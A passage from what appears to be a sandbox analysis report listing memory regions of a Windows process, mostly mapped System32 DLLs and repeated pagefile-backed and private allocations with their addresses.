"\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 901 start_va = 0x7ffda66d0000 end_va = 0x7ffda67cffff monitored = 0 entry_point = 0x7ffda6710f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 902 start_va = 0x7ffda6930000 end_va = 0x7ffda6959fff monitored = 0 entry_point = 0x7ffda6938b90 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 903 start_va = 0x7ffda6d50000 end_va = 0x7ffda6e43fff monitored = 0 entry_point = 0x7ffda6d5a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 904 start_va = 0x7ffda6fc0000 end_va = 0x7ffda6fcbfff monitored = 0 entry_point = 0x7ffda6fc27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 905 start_va = 0x7ffda70a0000 end_va = 0x7ffda70d0fff monitored = 0 entry_point = 0x7ffda70a7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 906 start_va = 0x7ffda7100000 end_va = 0x7ffda7179fff monitored = 0 entry_point = 0x7ffda7121a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 907 start_va = 0x7ffda71c0000 end_va = 0x7ffda71f3fff monitored = 0 entry_point = 0x7ffda71dae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 908 start_va = 0x7ffda7200000 end_va = 0x7ffda7209fff monitored = 0 entry_point = 0x7ffda7201830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 909 start_va = 0x7ffda7310000 end_va = 0x7ffda732efff monitored = 0 entry_point = 0x7ffda7315d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 910 start_va = 0x7ffda7480000 end_va = 0x7ffda74dbfff monitored = 0 entry_point = 0x7ffda7496f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 911 start_va = 0x7ffda7530000 end_va = 0x7ffda7546fff monitored = 0 entry_point = 0x7ffda75379d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 912 start_va = 0x7ffda7650000 end_va = 0x7ffda765afff monitored = 0 entry_point = 0x7ffda76519a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 913 start_va = 0x7ffda76e0000 end_va = 0x7ffda7719fff monitored = 0 entry_point = 0x7ffda76e8d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 914 start_va = 0x7ffda7720000 end_va = 0x7ffda7746fff monitored = 0 entry_point = 0x7ffda7730aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 915 start_va = 0x7ffda7830000 end_va = 0x7ffda785cfff monitored = 0 entry_point = 0x7ffda7849d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 916 start_va = 0x7ffda79c0000 end_va = 0x7ffda7a15fff monitored = 0 entry_point = 0x7ffda79d0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 917 start_va = 0x7ffda7a40000 end_va = 0x7ffda7a68fff monitored = 0 entry_point = 0x7ffda7a54530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 918 start_va = 0x7ffda7a70000 end_va = 0x7ffda7b08fff monitored = 0 entry_point = 0x7ffda7a9f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 919 start_va = 0x7ffda7bb0000 end_va = 0x7ffda7bfafff monitored = 0 entry_point = 0x7ffda7bb35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 920 start_va = 0x7ffda7c00000 end_va = 0x7ffda7c0efff monitored = 0 entry_point = 0x7ffda7c03210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 921 start_va = 0x7ffda7c10000 end_va = 0x7ffda7c23fff monitored = 0 entry_point = 0x7ffda7c152e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 922 start_va = 0x7ffda7c30000 end_va = 0x7ffda7c3ffff monitored = 0 entry_point = 0x7ffda7c356e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 923 start_va = 0x7ffda7cd0000 end_va = 0x7ffda7d39fff monitored = 0 entry_point = 0x7ffda7d06d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 924 start_va = 0x7ffda7d40000 end_va = 0x7ffda7f27fff monitored = 0 entry_point = 0x7ffda7d6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 925 start_va = 0x7ffda7f30000 end_va = 0x7ffda80f6fff monitored = 0 entry_point = 0x7ffda7f8db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 926 start_va = 0x7ffda8100000 end_va = 0x7ffda8142fff monitored = 0 entry_point = 0x7ffda8114b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 927 start_va = 0x7ffda8150000 end_va = 0x7ffda81a4fff monitored = 0 entry_point = 0x7ffda8167970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 928 start_va = 0x7ffda8260000 end_va = 0x7ffda8314fff monitored = 0 entry_point = 0x7ffda82a22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 929 start_va = 0x7ffda8320000 end_va = 0x7ffda8963fff monitored = 0 entry_point = 0x7ffda84e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 930 start_va = 0x7ffda89f0000 end_va = 0x7ffda8a2afff monitored = 0 entry_point = 0x7ffda89f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 931 start_va = 0x7ffda8a30000 end_va = 0x7ffda8adcfff monitored = 0 entry_point = 0x7ffda8a481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 932 start_va = 0x7ffda8ae0000 end_va = 0x7ffda8b86fff monitored = 0 entry_point = 0x7ffda8aeb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 933 start_va = 0x7ffda8b90000 end_va = 0x7ffda8b97fff monitored = 0 entry_point = 0x7ffda8b91ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 934 start_va = 0x7ffda8ba0000 end_va = 0x7ffda8cbbfff monitored = 0 entry_point = 0x7ffda8be02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 935 start_va = 0x7ffda8cc0000 end_va = 0x7ffda8d80fff monitored = 0 entry_point = 0x7ffda8ce0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 936 start_va = 0x7ffda8ea0000 end_va = 0x7ffda8ff5fff monitored = 0 entry_point = 0x7ffda8eaa8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 937 start_va = 0x7ffda9000000 end_va = 0x7ffda927cfff monitored = 0 entry_point = 0x7ffda90d4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 938 start_va = 0x7ffda9280000 end_va = 0x7ffda96a8fff monitored = 0 entry_point = 0x7ffda92a8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 939 start_va = 0x7ffda96b0000 end_va = 0x7ffda97f2fff monitored = 0 entry_point = 0x7ffda96d8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 940 start_va = 0x7ffda9800000 end_va = 0x7ffda986afff monitored = 0 entry_point = 0x7ffda98190c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 941 start_va = 0x7ffda9870000 end_va = 0x7ffdaadcefff monitored = 0 entry_point = 0x7ffda99d11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 942 start_va = 0x7ffdaadd0000 end_va = 0x7ffdaae21fff monitored = 0 entry_point = 0x7ffdaaddf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 943 start_va = 0x7ffdaae30000 end_va = 0x7ffdaaeccfff monitored = 0 entry_point = 0x7ffdaae378a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 944 start_va = 0x7ffdaaee0000 end_va = 0x7ffdaaf86fff monitored = 0 entry_point = 0x7ffdaaef58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 945 start_va = 0x7ffdaafc0000 end_va = 0x7ffdab02efff monitored = 0 entry_point = 0x7ffdaafe5f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 946 start_va = 0x7ffdab030000 end_va = 0x7ffdab08afff monitored = 0 entry_point = 0x7ffdab0438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 947 start_va = 0x7ffdab2a0000 end_va = 0x7ffdab3f9fff monitored = 0 entry_point = 0x7ffdab2e38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 948 start_va = 0x7ffdab400000 end_va = 0x7ffdab585fff monitored = 0 entry_point = 0x7ffdab44ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 949 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 952 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 981 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 982 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 983 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 984 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 985 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 986 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 987 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 988 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 998 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 999 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1000 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1001 start_va = 0xb580000 end_va = 0xbafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b580000" filename = "" Region: id = 1002 start_va = 0x410000 end_va = 0x413fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1003 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1004 start_va = 0x11be0000 end_va = 0x120d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011be0000" filename = "" Region: id = 1031 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1080 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1140 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1150 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1157 start_va = 0x120e0000 end_va = 0x12aa3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000120e0000" filename = "" Region: id = 1160 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1161 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1162 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1163 start_va = 0xb580000 end_va = 0xbafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b580000" filename = "" Region: id = 1164 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1165 start_va = 0x410000 end_va = 0x413fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1166 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1167 start_va = 0x12ab0000 end_va = 0x12fa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012ab0000" filename = "" Region: id = 1168 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1169 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1170 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1171 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1172 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1173 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1174 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1175 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1176 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1177 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1178 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1179 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1180 start_va = 0x8260000 end_va = 0x833bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008260000" filename = "" Region: id = 1482 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1483 start_va = 0x12fb0000 end_va = 0x1302ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012fb0000" filename = "" Region: id = 1484 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1485 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1486 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1487 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1488 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1489 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1490 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1491 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1492 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1493 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1494 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1495 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1496 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1499 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1500 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1501 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1502 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1503 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1504 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1505 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1506 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1507 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1508 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1509 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1510 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1511 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1512 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1564 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1565 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1566 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1567 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1568 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1569 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1570 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1571 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1572 start_va = 0xb580000 end_va = 0xbafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b580000" filename = "" Region: id = 1573 start_va = 0x410000 end_va = 0x413fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1574 start_va = 0xd260000 end_va = 0xd751fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d260000" filename = "" Region: id = 1731 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1784 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1937 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2092 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2297 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2553 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2809 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2861 start_va = 0xb580000 end_va = 0xbafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b580000" filename = "" Region: id = 2913 start_va = 0x410000 end_va = 0x412fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 2914 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2915 start_va = 0x13030000 end_va = 0x13521fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013030000" filename = "" Region: id = 3162 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3165 start_va = 0x7ffda0310000 end_va = 0x7ffda0376fff monitored = 0 entry_point = 0x7ffda03163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3168 start_va = 0x410000 end_va = 0x411fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 3169 start_va = 0x420000 end_va = 0x441fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3170 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 3177 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 3190 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3197 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3214 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3220 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3230 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3245 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3262 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3281 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 